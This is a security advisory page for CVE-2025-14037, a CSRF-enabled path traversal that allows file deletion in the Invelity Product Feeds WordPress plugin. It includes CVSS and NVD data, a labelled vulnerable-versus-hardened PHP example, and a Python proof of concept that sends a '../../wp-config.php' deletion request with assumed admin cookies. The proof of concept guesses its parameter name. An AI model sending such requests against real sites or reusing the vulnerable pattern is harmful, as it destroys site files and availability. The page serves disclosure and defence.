Security Vulnerability Report
CVE-2025-14037 CVSS 8.1 HIGH

CVE-2025-14037

Published: 2026-03-21 04:16:51
Last Modified: 2026-04-22 21:32:08

Description

The Invelity Product Feeds plugin for WordPress is vulnerable to arbitrary file deletion via path traversal in all versions up to, and including, 1.2.6. The cause is missing validation and sanitization in the 'createManageFeedPage' function (the NVD reference points at classPluginSettingsManageFeedPage.php in the plugin's trac repository): a user-supplied value is used to build a filesystem path, so traversal sequences such as ../ can point the deletion at any file the web server user is allowed to remove, wp-config.php included. This makes it possible for authenticated administrator-level attackers to delete arbitrary files on the server via specially crafted requests that include path traversal sequences, provided they can trick an administrator into clicking a malicious link. NVD records the weakness as CWE-352 (Cross-Site Request Forgery), which matches the user-interaction requirement in the CVSS vector: the deleting request executes under the administrator's session because the browser attaches the admin's cookies to the crafted request.
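The two defects the advisory describes, a missing anti-CSRF check and a user-controlled filesystem path, are shown below in a hypothetical "delete feed" admin action, first in the vulnerable shape and then hardened. This is an added example and not the plugin's own code; the function names, the feeds directory, the 'feed_file' parameter and the nonce action string are assumptions chosen for illustration. The WordPress API calls (check_admin_referer, current_user_can, sanitize_file_name, wp_unslash, wp_get_upload_dir, wp_delete_file, wp_nonce_url, admin_url, wp_die) are real core functions.

```php
<?php
// Added example (not the plugin's code): a hypothetical "delete feed" admin
// action, first in the shape the advisory describes, then hardened.
// Function, directory and parameter names are assumptions for illustration.

function invelity_example_feeds_dir() {
    // Assumed storage location for generated feed files.
    $upload = wp_get_upload_dir();
    return $upload['basedir'] . '/invelity-feeds';
}

// --- Vulnerable shape: CWE-22 path traversal reachable through CWE-352 CSRF ---
function invelity_example_delete_feed_vulnerable() {
    // No nonce: a link or <img> on any page the administrator visits triggers
    // this request, and the browser attaches the admin's cookies to it.
    // No explicit capability check, and the raw query parameter is spliced
    // into a path, so "../../wp-config.php" walks out of the feeds directory.
    $feed_file = $_GET['feed_file'];
    $path      = invelity_example_feeds_dir() . '/' . $feed_file;
    if ( file_exists( $path ) ) {
        unlink( $path );
    }
}

// --- Hardened shape: CSRF token, authorization, input shape, path confinement ---
function invelity_example_delete_feed_hardened() {
    // 1. Anti-CSRF: the request must carry a nonce bound to this action and
    //    to the current user; check_admin_referer() calls wp_die() on failure.
    //    Legitimate links are built with wp_nonce_url() for the same action.
    check_admin_referer( 'invelity_example_delete_feed' );

    // 2. Authorization: being on an admin page is not a permission check.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // 3. Input shape: accept a bare filename only, never a path. The allow-list
    //    regex rejects "/", "\" and ".." outright instead of trying to strip them.
    $feed_file = isset( $_GET['feed_file'] )
        ? sanitize_file_name( wp_unslash( $_GET['feed_file'] ) )
        : '';
    if ( ! preg_match( '/^[A-Za-z0-9_-]+\.xml$/', $feed_file ) ) {
        wp_die( 'Invalid feed file.', '', array( 'response' => 400 ) );
    }

    // 4. Confinement: resolve symlinks and "..", then require the result to sit
    //    strictly inside the feeds directory. This still holds if step 3 is
    //    loosened later or if a symlink has been planted inside the directory.
    $base   = realpath( invelity_example_feeds_dir() );
    $target = realpath( invelity_example_feeds_dir() . '/' . $feed_file );
    if ( false === $base || false === $target
        || 0 !== strpos( $target, $base . DIRECTORY_SEPARATOR ) ) {
        wp_die( 'Invalid feed file.', '', array( 'response' => 400 ) );
    }

    wp_delete_file( $target );
}

// The only way to build a legitimate delete link: the nonce travels with it,
// so a link forged on a third-party page cannot pass check_admin_referer().
function invelity_example_delete_link( $feed_file ) {
    $url = admin_url(
        'admin.php?page=invelity-feeds&action=delete_feed&feed_file=' . rawurlencode( $feed_file )
    );
    return wp_nonce_url( $url, 'invelity_example_delete_feed' );
}
```

The two checks are independent: a nonce alone still lets a hostile administrator delete arbitrary files, and path confinement alone still lets a forged link delete any feed the administrator owns. The vector's Scope: Changed and Availability: High reflect what unlink() on wp-config.php does to the whole site, which is why the realpath() confinement in step 4 is worth keeping even after the filename allow-list in step 3.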

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:H/A:H

Configurations (Affected Products)

Invelity Product Feeds <= 1.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-14037 Proof of Concept
# Description: Arbitrary File Deletion via Path Traversal in Invelity Product Feeds plugin
# Target: WordPress sites with Invelity Product Feeds <= 1.2.6
# The vulnerable endpoint is typically accessed via the admin panel.
# This script simulates the request an admin would make when tricked into
# clicking a malicious link.

target_url = "http://example.com/wp-admin/admin.php"

# Payload to delete wp-config.php using path traversal sequences.
# Note: the specific parameter name (e.g. 'file', 'feed_id', 'path') depends on
# the plugin's implementation, derived from the 'createManageFeedPage' function.
payload_params = {
    "page": "invelity-manage-feed-page",
    "action": "delete_feed",
    "feed_id": "../../wp-config.php",  # path traversal payload
}

# In a real CSRF scenario the browser sends the cookies automatically.
# For this script we assume the admin's session cookies have been captured.
admin_cookies = {
    "wordpress_logged_in_12345": "admin_session_hash_here",
    "wordpress_sec_12345": "secure_session_hash_here",
}


def exploit():
    try:
        print("[*] Sending malicious request to delete wp-config.php...")
        response = requests.get(target_url, params=payload_params, cookies=admin_cookies)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[!] Check if the target file has been deleted.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    exploit()

References

http://plugins.trac.wordpress.org/browser/invelity-products-feeds/trunk/classes/admin/classPluginSettingsManageFeedPage.php?marks=60#L60 (plugin source in the WordPress.org trac, manage-feed page class, line 60)
https://www.wordfence.com/threat-intel/vulnerabilities/id/8f95276c-7486-4dbe-a79d-702fd6be9cfa?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14037",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-21T04:16:51.263",
    "lastModified": "2026-04-22T21:32:08.360",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Invelity Product Feeds plugin for WordPress is vulnerable to arbitrary file deletion via path traversal in all versions up to, and including, 1.2.6. This is due to missing validation and sanitization in the 'createManageFeedPage' function. This makes it possible for authenticated administrator-level attackers to delete arbitrary files on the server via specially crafted requests that include path traversal sequences, granted they can trick an admin into clicking a malicious link."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.7,
          "impactScore": 5.8
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-352"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "http://plugins.trac.wordpress.org/browser/invelity-products-feeds/trunk/classes/admin/classPluginSettingsManageFeedPage.php?marks=60#L60",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8f95276c-7486-4dbe-a79d-702fd6be9cfa?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}